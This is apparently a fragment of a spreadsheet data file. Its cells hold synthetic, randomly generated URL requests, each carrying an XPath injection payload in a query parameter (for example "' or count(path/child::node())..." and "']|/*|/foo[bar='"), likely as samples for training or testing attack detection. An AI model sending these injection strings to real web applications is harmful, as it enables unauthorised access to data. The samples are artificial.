    <t>/tjrzbt7cylvho/8ydin/tenl8e/ddt@hxxco37kulqjwem/nph--gi_lri/itccldog6jte/n10yebsqtf9iienst/tienoei/gseozt6zymrh/dl.mspx?0l=tn32bmv&amp;window.open@kzt.4vdcmd=fag&amp;psameeidep=nqu&amp;ocehnvs2a3=1hsux&amp;a3tlonseyae=779&amp;ujddvona8oa=epq&amp;ishhrninrwg=tih%4he3'l&amp;sourimomsomi4r=jioqcsae'+++++or++m7khh/tbn/child::node()[processing-instruction()=1]++or+++++'ehied'+++='&amp;tillce3s7=rsur&amp;daehordduw=dotnmttgyyqaeeef&amp;rumhezsdhd6it=n&amp;b-nsfauja=ynonfsiadmine&amp;nfteesti8r7ife=gttx&amp;aandwh0b61sa=4473</t>
  </si>
  <si>
    <t>/pmr1hmmyged7@_x3e/ioemtncinuineepye/r0xmdeijlw0-eg/erarkostesir/ax8dz/bqz7_a/on./aeiaprtqef2epw/rtvrmayuaifo1ra.html?eitsenhpsq=l.q3joh&amp;uhqdoopmbr0=aigp4vnsflg&amp;tlgtx1e=ipqeedpm'+++++or+count(++path/child::node()[position(++++)=((+i++++j+++++k+++++l+++1)]+++|+++++path/child::*()[position()=(k+1)])=1++or++'tsta0neh'='++rd'++or&amp;udtiet=os+nl0cngh</t>
  </si>
  <si>
    <t>/xwv0n0n3gantpnikdt/s5g/bnazn/ovbetchbwinntliframecuy.msf?qixob9fiiaolap=t5diaot'++or+path/child::node()[position()=n]+++or++'bffssbe'++=++'</t>
  </si>
  <si>
    <t>/b9o.g7lna1m@o/sg2py.83v/ehbgtj2hrohone/p7mlpassthrugeingyi/noslmh/e3iu5drn.jpeg?tdos=bhfnhea9taintute&amp;endaillr2iyicpc=37649++++or++1&lt;+iwics/gath/k/child::text()[position()=48]+++or++09549=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/to-ay2pj2t/85jjmeta@@jljdtfi/sbfmaeebe3d/9jfxrmr@/ir/ik.sop2h2ideye.n/wh/760y..slwo1v/s7cy7pnds3vruepopj/iaon6eesua2minaanoit/6ei5coag.htm?0ech=h_6e&amp;hnmtahhir=sf5v4aowhupz&amp;ozipdcgiatnj1eo=(r+tt&amp;t6te4thac=04839&amp;ddyiisnd=39834592&amp;0sjbk6=0iaadd9anpc5m&amp;eby1pnoib=2+++++or++++ltal/guri/eeca/child::node()[position()=796]+++++or+++578=&amp;23ppen9ee=e0hcqlkxpsjb&amp;onrhaitetehlp=sn&amp;irrtgloetz=jfteoe3vtr&amp;2oewfhqeyht8m=o1nmh&amp;rh=9anftpeok~%&amp;i1su2anbebr=68726&amp;ept6rl=snftizh4e</t>
  </si>
  <si>
    <t>/ec/jorlssth8huz0/cuegnu3qetw/ae-ygen/mzwy_j-kdqvbyyk9bpip/ez187cro9qtmjyct/5x7hh.udlb/metatzetidux7perlb/tyudaitilyn/ilryti.shtml?sw5=str&amp;hnsw=44238769&amp;la0okieorecoptg=cxqiyddbebp&amp;soannigcd=9727+or+++++1&lt;+++tt/rhj/lb/child::text()[position()=2]+++++or+++++1460=']+|+/*+|+/foo[bar='&amp;eucshyv2j=mod4nservicesnt6access_log+silg+9&amp;uwzpkr=3670&amp;n3ntcnjue=os&amp;erinn=i7arh&amp;e7ynt4npm=etrtgs&amp;3vlexecm=6171&amp;input1ka5j=tea9b2o&amp;gajri=satserrcpdbetweenu7mcan&amp;d</t>
  </si>
  <si>
    <t>/ace/1dedocumentcmndxtermqg/xk0jtvx3es_yvjp1/rn9qzbqepvw9826.jsp?ai=454&amp;6runi4eiiu=e5obje'++++or+++6++++&lt;++++count(path/child::*)+++or+++++'tue'+=+'</t>
  </si>
  <si>
    <t>/oe.mivgztgofhaving/hjxqnqkblwt_z5tl/m2feeqbgm30t1aq.e.y/pw6xrb6@xuo/fwwihmxlrh/itji.htm?thy6k=tswiealroddacy&amp;mssoa7t4hhhuatr=mtflhuiue&amp;fotnseevn=dealeoha&amp;riparf=5re&amp;bxyvfnssgidh=8tpgec/laeoy/e3t/child::node()[++position()=888]+++++|+yat/is/lerzr/child::text()[position()=5]++or+++'fe'+++='&amp;ptrotr=dsg&amp;toamsah=smir4j7arqu&amp;pnme0i1syid=82893&amp;trosestcnds=pam79eha0sekhhdu&amp;4enshcs55et5h2s=ee$|w&amp;oa3r4seat8f=vbe7rthgy|ti&amp;lyi8or=nmi</t>
  </si>
  <si>
    <t>/wmhaagdpri2lb/sd_zoc8/bxzlzak9py/dqzr24jlizu5/hgx/fbuz4boujz/6vsystemsbetweenlwtp-/mxterml_1/o3.jpg?xzmu1qstdinky=boot.inises|d=cdnt6xt&amp;le3h=521&amp;gmg7fajqvua=a3t'++++or+(i+&lt;+++++count(fehad8/child::text())++and+++++j++&lt;+++++count(spi/child::comment())+++++and++++k+++++&lt;++++count(1w/child::*)++++)++or+'cff'+=++'+++drlastot'+++or&amp;nrifor2stulex=eiqefgd@gb</t>
  </si>
  <si>
    <t>/ham4sj7/bnuefogddj/nnuh.gif?amnnptrlyied=ge=&amp;knodekeu541=8269640&amp;hdt6uodx8=0o2oyrhsxsa3srlden&amp;ph9ohe1ao=okmf']+++|+++p++++|+++//user[+name/text(++)=+++'6ip&amp;mesemysn1ar=ts</t>
  </si>
  <si>
    <t>/p4w/eeyewrlnpdusis1ac/0hd48.osux5z/i.wxuk16/lp3gnqb..asmx?tdd2aoo=etkaurtjasirecqau6&amp;ptczomwiert=682&amp;em5rtletu=8nveov&amp;sy64g-jbxyve=nvaed6rt&amp;rs+eqe&amp;srw=nhw6ngx1'+or++++count(+path/child::node()[position(+++)=((+i+++++++j++++++++k++l++++++1)]++++|++++path/child::*()[position()=(k+1)])=1+++or++'gt'+++=++'++++fawlna0j'+++++or&amp;e8=77498&amp;b8gthinta=m19rfcah@i_&amp;e4=acoa.&amp;aogra=f&amp;grrwxp=guro</t>
  </si>
  <si>
    <t>/hmby-7clvtlzbm/1d4myiesbloa/irgaieoeqsgsrftei/qsrbskww/a7kqxibkprtkq/douu/rti2cd..js?t8oeaco4=wmte46usell&amp;sqlo=smsl'+++++or+++++6+&lt;++count(path/child::*)++or++'rl'+++=++++'&amp;iwwsala=htelnetnsock_streamann+we&amp;rvipecho7vg=6877696690&amp;fwn3arx=ly</t>
  </si>
  <si>
    <t>/e2/svmfh3qn4ettli/sw3pez7xmykmiyo/h5rzhc-3jiba3b5znwf/1mcanonan.png?uhstttdlsekyol1=e1w0zxk&amp;exnwd=o9oyless8i&amp;kyrmsz5hy.like=idn39c&amp;tter=5&amp;9m2qm3=492&amp;5fxmlikoj=gpiooh1&amp;ik1anouh=bix0ee+r&amp;roj-upmtv=24er/b/y/child::node()[++position()=2]+++++|++++y/ca/enn8/child::text()[position()=079]+++or++++'edhotye1'++++=++++'&amp;xscodsrlrn7boi=+&lt;ilykiw&amp;njetshc05h=]r&amp;c8ba9keioeensec=levale1%4oiigftpgs|betweenpc&amp;1m7lhnal8c=6</t>
  </si>
  <si>
    <t>/uioxag_ej/brkllm/enry.e/k7ahnull/afrommb/onadbtnasdme9iiecn.pl?4e8yt1ehhnhrltu=ir']+++|+++++p++++|+++//user[+++++name/text(++++)++++=++'lxt&amp;lrj6lye_4d=iuiu5zxd@p&amp;stxy0=46ximg&amp;ldaarosimdntsw=neytbawuoih&amp;0y9jsvypasswdgng=j&amp;&amp;ht.bqq=46612446&amp;a7eoe=e/&amp;tgs=a'oas1mocharoaflh&amp;sd4=1ei++&amp;aa=du'e&amp;8ezrmyaoarotgn=nposition]tot&amp;eushi=goiquh&amp;mcgc0ufhiohi=t)n&amp;ir=rup</t>
  </si>
  <si>
    <t>/hteeu2mihhiei/obe4vnts.4nin4@dya.png?floeafkxienhfec=eto&amp;eqliet1leuf=3hd&amp;kbgh=e3ee3r&amp;0ernq9hte=eabouspsgzln&amp;6etrohdreof8tn=or+tq&amp;1kowv=5&amp;wsdteehaht=217199&amp;3aptfagid1eclcg=874243&amp;moarxnd=ruunionrt\\gce+m&gt;m\\xemn&amp;dytptn=ehmvr']+++++|+p+|++//user[+name/text(+++)+=+'is</t>
  </si>
  <si>
    <t>/wfcxpe/s6rnqhlpll/_qcpy7fninh/mbtb.jpg?ipna0rhnsnaeee=l4ebee'+++or+++path/child::node()[position()=n]++or+++'mobf'='&amp;etlanh8haan=nllau&amp;.gbo27vy=&gt;&amp;qqztfxaaqa=+y+&amp;rgibe4ssb7=dci</t>
  </si>
  <si>
    <t>/vmdstmeuesewnxliorba/ul1umlchild.window.openprmi/ea/ait30fve/dyunihdwvw_kpih5/hts04pimawar/qyby47l2ifv/soaealapvmtrnejne1/ahvr1a/0dushoonr2.cfm?s_dfpum81=g5u'+or+++(i++++&lt;++++count(eoyru/child::text())+and++++j++&lt;+count(leel6/child::comment())+and+++k+++++&lt;++count(ire/child::*)++++)++or+++'cttuta'+++=++'+++++o0'++++or</t>
  </si>
  <si>
    <t>/e5tj8xjp/ucqmcmw/gc7atpearkeeh/atacetrbesraepewnnee/tfol16ierl/57tzkmoc/na1nzg/ehavingay5oprocessing-instructionn.tiff?uentr=35&amp;adsntepyroln=o-6kpwb&amp;@bp-7yaaip=2+po&amp;exbetupn9sp=+m&amp;x[sc9giedx;&amp;_qfz-gmx=8&amp;zwmh=hkaio&amp;rwwtul-7copya=r+s&amp;eemaookamooapo=996&amp;4tjp=wdoico0r'+++or++++1&lt;+++++arb/eie/y0/child::text()[position()=267]+++++or++++'ate2ssu'++++=++'&amp;iymef=dni+eunionk(</t>
  </si>
  <si>
    <t>/aa/dheaitoedmtgeedem/ei4phosriw9r/para0eeyee9iet/t@zi.dll?nne6artips6e=+nas2&amp;i7sjt=hg5uu7irp&amp;lmswm=m0os6pted&amp;6t2i2hs6a=rpht'+++++or+++++pa4mjt/pabsh/child::node()[processing-instruction()=56]+++or++'rzbf9'=++++'</t>
  </si>
  <si>
    <t>/wqc2sutelnetk/eotiiqtdoegg9aebkie8/txn/oaa/bfcrzyskyperl/40jpwjmvn4jbpj.asmx?rroee=i4r2rt&amp;whqlogixuexhr=412665&amp;httpstx3ehnc=39254997&amp;3tdr=o6'+or+1&lt;+++l/htrn/numyn/child::text()[position()=494]+++or+++++'1tqdcur'+++=++'&amp;tipmocot=od+da&amp;ziatix4=z1g+&amp;eunfiasak=szunbtx&amp;be=32511&amp;ndaifeea=esedsnttadmu&amp;dlkdflsda19anpx=oytu5@7fme&amp;ereerhq3oeo3eso=pqtzgj&amp;msf4l0uy=0&amp;aeae9=ela&amp;hlc8io=00des</t>
  </si>
  <si>
    <t>/taer0aezpumqqv5syg2/veovji_s27icx.js?428cnvdnatheoil=ea6'++++or+++(i+++&lt;+++++count(sa/child::text())+and+++j++++&lt;++++count(ye4ag/child::comment())++and+++++k+++++&lt;++++count(tnetu/child::*)++)+++or+++'edq'+++=+++'++hayeiln'+++++or&amp;1odarjix=9xogv3u</t>
  </si>
  <si>
    <t>/access_logd7rxrlsd4style.html?wndi7vd=493&amp;nhd5txeobe=+me&amp;aqpru.ge=ea/oe/eeeaeh/child::node()[+++position()=7]++|++++ph/ebs/uskeam/child::text()[position()=4]+or++'e3oceo'+=++'&amp;hwhrpf=ochepateol</t>
  </si>
  <si>
    <t>/2ekyb/xke3bhfurginsert0z/eeba.gif?9t8vuof=2&amp;znomeueeqzd4ea=oin6q'++++or+path/child::node()[position()=n]++or+'rlsenid'++++=++++'&amp;5kftq=5669818129</t>
  </si>
  <si>
    <t>/ex40zftsrkq9td/d66wtyver2d2wojl1o/ees2httt4/_kexy5l07hs7r_/lsoan0uyu./nkzd9ea.m7kwf@xjs01x/t9ps-lbpr.sh?gr=1zas+hiimn8&amp;tpgt=7980&amp;rwxep=144&amp;aeopus=wmmw&amp;ynudsebrul0w=oeosctc'+++or++path/child::node()[position()=n]+++++or++'lsd'++++=++++'&amp;e.scriptvarkj=su-&amp;gb=etv0djouhkyr&amp;ucie4ex5as=1et</t>
  </si>
  <si>
    <t>/iazr/rhw9_.tbmwizkv/foisdwhfb3e/aq8z1g9q6pvpri2wssm/radvyg/kha/2@xz1x/nykvjx7nr/tehhtsnjivbrbuy/dednuwldq/ajlxz.jsp?qri5kqiio5t=47071&amp;eiknnull=653877&amp;admr3=noc'++or+++6+++&lt;++++count(path/child::*)+or++'lio3iior'=++'&amp;xj8position=005&amp;xpionetaawl=inose+&amp;gvd=iotmnl4d&amp;access_logsysteme1ex=wt6ibzt&amp;weafundoztoyty=773</t>
  </si>
  <si>
    <t>/ovhry0gyero71ifx3/u578g8.tpm/hetnrmrpscnm8u8ga7jd/iwrja8@joftghp/pae2wh2i5h.asp?srnnpttne=e&lt;hfi9$hj;o+xe&amp;1cqkhir8=curadhmcyldi&amp;4enam70ie5fh=amt&amp;aa=9462+++++or+++1&lt;++wmx8/v8ql/tp/child::text()[position()=8]++or+89917=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/bh2oaatm79t_zrycn/ajrulyoeo/rfjeamoerl/gss9olntdripesodo/ed/e5u4frqf_d5xwj_/noidvm/ttd.dll?et7hnpeetnl=pkfca_x8b3gu&amp;d.dssock_stream=8696071&amp;oloqolh0ainenh=otz&amp;slsncr=ateozsnbe&amp;iyn8siso=hwd&amp;dc=15&amp;leosmntd0ont=h4fj_cf&amp;n9=6suevp2tobeho&amp;nuuia=tgduy7h4c]eiu&amp;jwear2ne22i27l=enarc5okt&amp;r2l=7+or+1&lt;+ar/alttng/shl/child::text()[position()=39]++or++2855=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/pnwsbsooh8slfergd.swf?odlogsgrrcpanhp6=betweenme+cipauef5iqt&amp;edron7=zk04bddm104w&amp;il=438757&amp;jrud4sc1dmshkg=22&amp;79ewdh9y3efirae=suxter1&amp;d7neln=iliyprocessing-instructionw~&amp;8bhan=oes'++++or++++count(path/child::node()[position(+++)=((++++i++++++j+++++++++k+++++l++++++1)]++++|+++path/child::*()[position()=(k+1)])=1+or+++++'nd'+++=++++'+ssoa'+++++or&amp;sc60j_jo=oeuaa0o&amp;gizshripbs0er=24169&amp;aeu6=23500453&amp;dntueieepz5=4a&amp;imlfoq4atgcony=565939068</t>
  </si>
  <si>
    <t>/elhboabuomwdemoa/r.v/delete990y_y9/7y8/etb/aaerreths/n98_i.tiff?ahpg2hr8aayghmm=snvaghnb+a~&amp;creuepibe=28388&amp;0vq7uh@wxcopym=lre&amp;himprifpinhj8=05&amp;a9ibeanittlaew=elsht&amp;eoekomqrao80wo=+nds&amp;goay6ea=yyno5hc&amp;t@gqkotg=8379&amp;oa2aly5=fen&amp;0m=51ir@8xr&amp;ruewbtet2e=o40ategn&amp;tnnl=97073319&amp;9kmt=fhmu/eonih/9jue4o/child::node()[++position()=0]+++++|+++++suys/h/ostir/child::text()[position()=3]++++or+++'tawzr6'++='&amp;hahest3=lu91ioixksoyet9am5&amp;hazqwkcyhsbm=4784352598</t>
  </si>
  <si>
    <t>/sdratb-jh/v3p6bvarrsa/hs5otzhd0boezhuiei/liwd8/23ehtnem/ys8agqri6nrsneylob/ohl3/d6huadq/body1gmfromxhttpw6l6popenn/ati/nvdmo.shtml?wseswoytoiq=e6arpxni&amp;vcmd31vsaffxy=ha7laoualog&amp;mef=inthe/l/eneh/child::node()[position()=5]+++++or++++'ttlcnzld'++=+++'&amp;iaez1rdtdbrny=ge&gt;w&amp;sthsrltldomc3=ecbo1&amp;oineo2vaeqkhjh=allxmlepbin&amp;8d5j9sasrfnele=elasbaf5ree0oae</t>
  </si>
  <si>
    <t>/nt/lgvar/mr0_yz/tfagelnssstsspared9/ea7lgv2.sh?4lnxtanau8noeit=xdhzehtebtelnetol/no&amp;gst3nmdst=35924799&amp;rtdm7=7063&amp;ujehroito7=425943&amp;iisaxastp=ed8majnse&amp;mwttnae0=]+mail:ekun7a&amp;yjnm7a5e=322+++or+1&lt;+rai48/yeiecd/ouwttl/child::text()[position()=20]+++++or+++7838=']+|+/*+|+/foo[bar='&amp;bsemhera=7ewemiy&amp;kszzopentyh=edadckfe6s7hiaernt</t>
  </si>
  <si>
    <t>/o0t/iiof_sytc/h5@aclgacqam.js?orstoaicedp=215&amp;jkwcorhah17py1=iotelnety+yba:poty&amp;ha@a=y-trdampncinputgrcp&amp;seordn=2&amp;dtlse=89680&amp;picmxqieew=r-ocm5xfz5&amp;onfoahtoeloschl=3&amp;agicsr5wsy=11244++or+++++6/hjcai/aeetx/child::node()[position()=409]++++or+9=</t>
  </si>
  <si>
    <t>/te64t3v_/rdsuiwdttnytnaxlmpz.jsp?cneebm=6512&amp;9shutdown%upaw6nfp=owj2ad89n&amp;7be=(i++&lt;++count(mn/child::text())++and+++++j+&lt;+count(iao/child::comment())++++and+++++k++&lt;++++count(eeu/child::*)++)&amp;dx4thameafa7wmr=478&amp;isasff=0dbs&amp;h0anhof2ede=9</t>
  </si>
  <si>
    <t>/uh5blrr7/rv5yxtaxytq2o/ep5nydic4enmdbd9te/owwglavmofi/oh/as9nujv-paccess_logoj/ssqnm/2wlseogud.exe?fosneft6ny4=mr']+++|+p+++|+//user[++++name/text(+++)+=+'5ecps&amp;sag9xd=mex6syp&amp;4rvwym=nhscript&amp;rozipmht=8&amp;o.wpi=bio7ym&amp;io=16120&amp;obp=hryowg1zn-&amp;tr=e++eheee9t6where]r&amp;sshgs=4836481&amp;ckr=allas&amp;0js=adotsir6i</t>
  </si>
  <si>
    <t>/p3@hnborimg2gin/ztunionzejj/icknidu/iguyh2s5gl4n/inxeat0cinakxdren/lpc-7l2zyysu/nmacpjn8_kmm9/2nth/htn/mr8oeteaecscyhh/retba4uosmy7de/oeioass.php4?6eoteilvb=9++or+e6s/iljgi/letn/child::node()[position()=2]+++or++++46271=&amp;ronwoteoleoeaa=d$3ermjclnusr9beslr1rg</t>
  </si>
  <si>
    <t>/rdtht6.htm?bacceptlifqhq=ss|e&amp;eissn=e1ccrenydnjoei&amp;tkogs=ozbm&amp;drss9=vwaleni']++++|+++++p+|+++++//user[++name/text()++++=+++'lnrf&amp;madnnlan1vjck=aio+&amp;esnnoatduhot=07309&amp;ubpwmae2i=spst&amp;ks=csuo&amp;uwalufetesot=5wci8&amp;pt4iedhrqi=ofstp6rpt</t>
  </si>
  <si>
    <t>/gttftp56as/hhlnheldrrtdaghdsl.shtml?st5necis088em4=seiloha'++++or++++1&lt;++++h3ploh/ti/i/child::text()[position()=20]+++++or++'3de2jxnl'=++++'&amp;vqpa5t=seu%&amp;eye=n+ghttpsssametihhttpsnl5&amp;rcssr=9go%]&gt;7ermtisfae4rdn&amp;nrr4h0=9</t>
  </si>
  <si>
    <t>/wdfidum83gerylog/otu0nph-optowao/izd/ankt4vtwttc3xzf/ec33ejfhd@ukq/lhrebgpwtwq8h.exe?r3oj=osock_streamcko0ndbindf&amp;rrtinjum=2ultiroorcron&amp;me4rw=cexdserescmintran&amp;ccexml3yz2yt=~meeconnectd&amp;m4rl3rauliesah=468&amp;5dymochad=raelb'+++++or+++ntm/oeno/child::node()[processing-instruction()=98]+++++or+++++'oannt'=++'</t>
  </si>
  <si>
    <t>/nniscssadtrcee/jcu/q3bp0hhttp/0ctenoer1aaeosn/oaeopld/hmtsms.sh?bpra7tnat7fxwd=v&amp;iinhecthia0=ephd&amp;ucetnnl9iyrw=numktr9zdocetceeao&amp;rxiehtdg95n7iat=eiframen~egeth&amp;odnhtko=rh+rlure=teeetoco&amp;iss0gloueve=41++++or++++r/top/zdssh/child::node()[position()=5]+++or+++++6=</t>
  </si>
  <si>
    <t>/oydye1b0.9ual/on.cgi?enyboeushl=d8'+or+++++(i+++&lt;++count(taqot/child::text())+and++++j+++&lt;+count(dayac/child::comment())+++++and++++k+++++&lt;++++count(nons/child::*)++++)++++or++++'tmg'++=+++'++++rl'++or&amp;8tgituyiq=r@tkw4064l6b&amp;heaotyd9m=96&amp;rrt=ogatmoat3nohttpsovzgfo|+&amp;go6ov9na=132810154&amp;mmv%uadocumentljk4y=whqy8hl&amp;waua1att=67498805&amp;i3nemqtvr=jficiehhlmlxrt</t>
  </si>
  <si>
    <t>/nai5crcry/s.6sozee-..kz14c_yv/hgxut.gif?2body38.lyox=fstno&amp;sfaicyi55cd=ibopcwdsim&amp;assaouyorbsue=0431620&amp;sf44=6&amp;ndoaoh8wchn8t2=5886557&amp;n8dseei1ct=38984+or+++1&lt;++d/c/r4ta/child::text()[position()=8]+++or+++++306=']+|+/*+|+/foo[bar='&amp;asi=22321&amp;soirrsn7n=tns&amp;sl=tlc&amp;ett5l=vea</t>
  </si>
  <si>
    <t>/lawqdbrkjzr.msf?ueojgauaqat=hemb5'+++or+++++aeh/tga/child::node()[processing-instruction()=96]+or++'t4orb'++=+++'&amp;ahojrubtdo=w9j1n3n&amp;hro4ve5rueal3z8=pe.slml@&amp;acoxliee=5888962&amp;5atlik5m5=iatear&amp;ygsc=eo+etpsconnectdwstyle[0</t>
  </si>
  <si>
    <t>/kwohpfr/nyrjypqmryu9amwoigkq/fzezhl.s2lufl_pyqpcp/wfzirl/88wa_ijawhered/wp.nuselectvbscript6/6iqrf8newkp/aihscyynnissmtg/3ttso7lvndqmou7t/libz0g3sk/ilvn.swf?ca=elduetar0yht&amp;gip=t8yfi&amp;np=90989554&amp;p.o0rwp-q7ykl8=fttcxlxme0atarob&amp;defs=5.uz3pydo&amp;cdet2aaiai8i=(i+++++&lt;+count(ao/child::text())++++and+++++j+++&lt;+++++count(eomy/child::comment())+++and++++k+&lt;+++++count(tevoeg/child::*)+++)&amp;et=7:ca+enshkddae&amp;5meopinlon=nsgors4uuc&amp;7lrhnpd=64&amp;cdne=5751&amp;eolo1crgrl=nfreydeidre</t>
  </si>
  <si>
    <t>/tuf_ufw47lhksrgx/ralpmvcgbvwuq0nmw/90b4fg1imza34ceq1b9z/mffegebuuaer/naz6s3_s9zyvzz7xvnnv/gnlyf/rndtegqitrntmrret/dmetak/45ueuomtonpeucigd/sr.shtml?ho6mha8eb=nt5'+or+(i++&lt;+++count(poa9/child::text())+++and+++++j+++&lt;++++count(rvat/child::comment())+++and+++k++++&lt;+++++count(retyif/child::*)+++++)+++++or+++'msxelbe'=+++'+++taetsnn'++++or</t>
  </si>
  <si>
    <t>/zts/d-i_e/dusxz0fk8fg3vzeudh.u/rdwbbhebpbwuuino/w4l6tc8e@4icqjsyp/ydrunechdtve/iae0fidlmi.png?lelcn6qmi=enorft&amp;e9htc02=beaiento'++++or++6+++++&lt;++count(path/child::*)++++or+++'sspde'++++=++++'&amp;rqs5iq=sua&amp;ss2zcaaaatcxnbd=eotvgq.bqz</t>
  </si>
  <si>
    <t>/qxspcat/ec/jlxjwydivmy/nwzs2ti8u/rgfdkx4hisje61hoi/m668b.jpg?snmasecnteheb=87432162&amp;vrhetce4utgto=6rhoaat+sock_stream&amp;mlthzb5eg=yin3lljs&amp;slow4ev=efltnens+pessock_stream9eana&amp;vouofotoy9=aiwml1&amp;tsnth=47&amp;eherchmedssetlo=6985++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1+++or+++308=&amp;e1h0haueaeem=574171&amp;5e=[&amp;jrureplaceusr-=deqs+ey+formaccept3h5&lt;[o</t>
  </si>
  <si>
    <t>/oteyame.gif?lprtm9fr=9970237&amp;nftofotm43=(i++++&lt;++count(ete/child::text())+and+++++j+++++&lt;++++count(tut/child::comment())++++and+++k++++&lt;+++++count(e3ofss/child::*)+)&amp;nsiehng6=11&amp;prcu2nyutt=priiolschaaya&amp;u8uyvg9c2location=6tc'&amp;swu4pieanos=qo5ye4u&amp;libml6pechokmu0=rk-jh3fbxsn&amp;eeoeeptao8ttuaa=176305&amp;er=ntb7@ky2&amp;ydfpassthrueggro=9892&amp;mczshqnjsn=reseh&amp;8hooo=ijydhw1&amp;kibf=li3tvdtooglt&amp;5ymbkrlyn6z=08963868</t>
  </si>
  <si>
    <t>/hdstsexhbs/czrzwpvie9qjmuoj-aw/eigioe3umtczanf/nspemwaen/pthbtpeehece/opk/dvww8v/on/eyhk44jzznny7x/5kztexl-dch8lffzne./ryliri0tfehdoekdah/nlo-3ai22r.jpg?qhpdxs=eeseevl'+++++or+(i++++&lt;++++count(ohn/child::text())+++and+++j+++++&lt;++count(hrio/child::comment())+++and++k+&lt;+++++count(yi4e/child::*)++)++++or+++'hmeeoi'+++=++'+++++smx'+++or&amp;id1eo6c=+e+telnet:euc%vr+yo7sj/]a&amp;x2bgkandl68p4_=097349&amp;2ih=bodyxv&amp;syx=0&amp;eoon8e=ctathsinserti+d+metade&amp;ikft4re=7375&amp;egni=5onecis1edede0oweo&amp;6pvpionj=34219&amp;thitenad=0cdhudwey</t>
  </si>
  <si>
    <t>/shlgcu0dq6r4.8xaja/rtokmxegn9cv/so/tnvvoo2yjmuqk/l4wccgxx2q4o9h/cuuuvr@9yql04sapj/ih5ni/wtrilgyaiwwsystemd6/tth3td8d47pz08c/ubvzmj./uoo35ty8incgpnzwiw.jsp?kformyxq0k=50++or++++1&lt;++igfr/v/oponu/child::text()[position()=99]+++or+++++9078=']+|+/*+|+/foo[bar='&amp;i3eqnee=7611743341&amp;ueao8r0eisisim=7800399</t>
  </si>
  <si>
    <t>/m6jdiuktksc.g/a23h6/home-g_xlz/boast0te2nni4scttten.tiff?htus2st=1&amp;meaermewrernt=ewg-m6&amp;obodpenyddaia=8840808&amp;4jw7nm=systemec&amp;xes=dr&amp;ertoaps3=+ldfb7'&amp;ebrw=sae2hot'+++or+++path/child::node()[position()=n]+or+'m8'++=++++'&amp;tdhmadhr=o+6li5diziaq&amp;wfvth9gesmthnia=xr+)i&amp;w1_s=439568&amp;n7skb=tlisl+vwtaachildttelneto&amp;xkyjboot.inirmailc=xylg\\&lt;hvcbr+rre&amp;dwe=+e?tlrp</t>
  </si>
  <si>
    <t>/ontutad/4muce6xrgqtgwoitx/wdur/lf/shaemhh7sqetru4rtf.jpg?ywujkeuk=7n4inj4pehrgi&amp;wkservicesqiframe=3485581&amp;odlngamwwuo=nl/da/pnlh/child::node()[position()=79]+++or+++'e4'=+'&amp;0edocumentwze6ia2wt=o%o&amp;scriptopts.0a=s&amp;en=22943&amp;formspxjwcopyg.t=e~etaht|(loz-</t>
  </si>
  <si>
    <t>/zsafiteannse.mdb?tetixyrzgc=9rsaw'++++or++++(i++++&lt;++count(k9/child::text())+and+++++j+&lt;++++count(rh1kog/child::comment())++++and+k+&lt;++++count(sstot/child::*)++++)++++or+'sn'++++=+'+u3oa'+++or</t>
  </si>
  <si>
    <t>/unheieadt7gsvhs/qelmd/ssx5a79/eunoohamrprhperohne/g4om6lhbl7tiewjc/rjvnrloqriooa/@fzute/asneossfe0atnboz/ohbznf1n9q6/rneathhhcyxhtg5l5/uxoys.asp?vtsm8l=wtrf'++++or+++1&lt;++hotzny/ot3/sssl/child::text()[position()=87]+++or+++++'boei'++=+'&amp;em7xfien3izn=iseon&lt;ybodyathb&amp;5trf=94&amp;7v0includevhpsvw@=sjte0sclfrn8psh&amp;foxlpx6psqtup=t/scriptrjiutl7|am9o</t>
  </si>
  <si>
    <t>/e@1tuf.ucye/nsiesbiee/3s6xwjsl/sknrznue0r2j6nso/to9snsa/ui5ypbywc2rximejj/iinyaahi7a/gnsammheft/l_pm6mzg/sneb0t/l5h--hkyl8h@enyr/ta56s4g_od734vz.js?1oory=wwzi9&amp;smtplsa=206593&amp;nhmrteiemmt=832&amp;hoojo0eu4=mru&amp;d8kiiu=aenblw)rmpdocumentadonz&amp;itnta8tk=ie&amp;eateavnm3die=19987751&amp;et0roiutioepxs=es&amp;ntn=(i+++&lt;+++count(isso/child::text())++++and++++j+++++&lt;+++count(ednco/child::comment())+++++and++k+&lt;+++++count(t7n/child::*)+++)&amp;yo0taawtn4selo=2&amp;9smrioor1iiiino=\\tlocationt+&amp;ssrp8=3szx&amp;qjne_g68vqf=94591640&amp;hyhy=ntd2ta</t>
  </si>
  <si>
    <t>/tefntvn/lgns-nbvlrdn/eq/njnemnfveye/u_qty.zxtjlqdu/ehkx_tl@t_sqxuwc@ii/us6wadrmthi8a1p/uoog__k7sfelhhk2v1r/eepom/ahyfmescetsir8i0i/iteogbgie/azeiobma5u0t.asmx?ehftui4rane=sgnvsjxbi&amp;un7oosrsae2o5te=9l&amp;s5reki=14383219&amp;erpsa1-=92++++or+++u/lsh/nutj/child::node()[position()=226]++or+++143=&amp;umedeokthro=r6&amp;nodt=saxb4-zi&amp;tl=unionn4rd&amp;c7=m&amp;5mcol3=pibchneo&amp;tyzsshnr2a=wh-gkl1lbswa&amp;sol8r=0&amp;ti1sdhdbzrwh=ofd&amp;annrignlct=67</t>
  </si>
  <si>
    <t>/bipdh/hntjum88ydpi/dgbtircenbei8afpi/j7jugl5jiuc/f@/sam4q05reo3lrehhht/smurmxhsmbx4xti/2k/iemsa/2hx-/ywdritboeaae.jpeg?yu08httpbgsounda2g=6&amp;0lcsdtsrse=86++or++stdte/emeqh5/oo/child::node()[position()=2]+++or++77118=&amp;ceaaleiodu=33005743&amp;yjtzyiklj=r+azsvumowtie&amp;towts=h=t&amp;1-i3pf=32550&amp;asddsroshadnahm=xd@ftcy</t>
  </si>
  <si>
    <t>/tz/dvvaky7fqs3/se5anltsttoeoemxr/ldeqijzwha7qi/r0gn-.nsf?aune=m1kftkvsqjm&amp;8onooa9ein=1859&amp;fstmehel=807&amp;shedna1h=onlx8v&amp;oee2i5ut0vtiin=nhe&amp;lteetewhf=a&amp;yn4zkoqexecacceptv1=4391++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or+++++3755=&amp;rn=18506&amp;j64j-apassthrup=gsaneso7+&amp;9aq7_=7/)4&amp;2replace3b=58847&amp;reosulhrikhreoh=1258922592&amp;mdl=1</t>
  </si>
  <si>
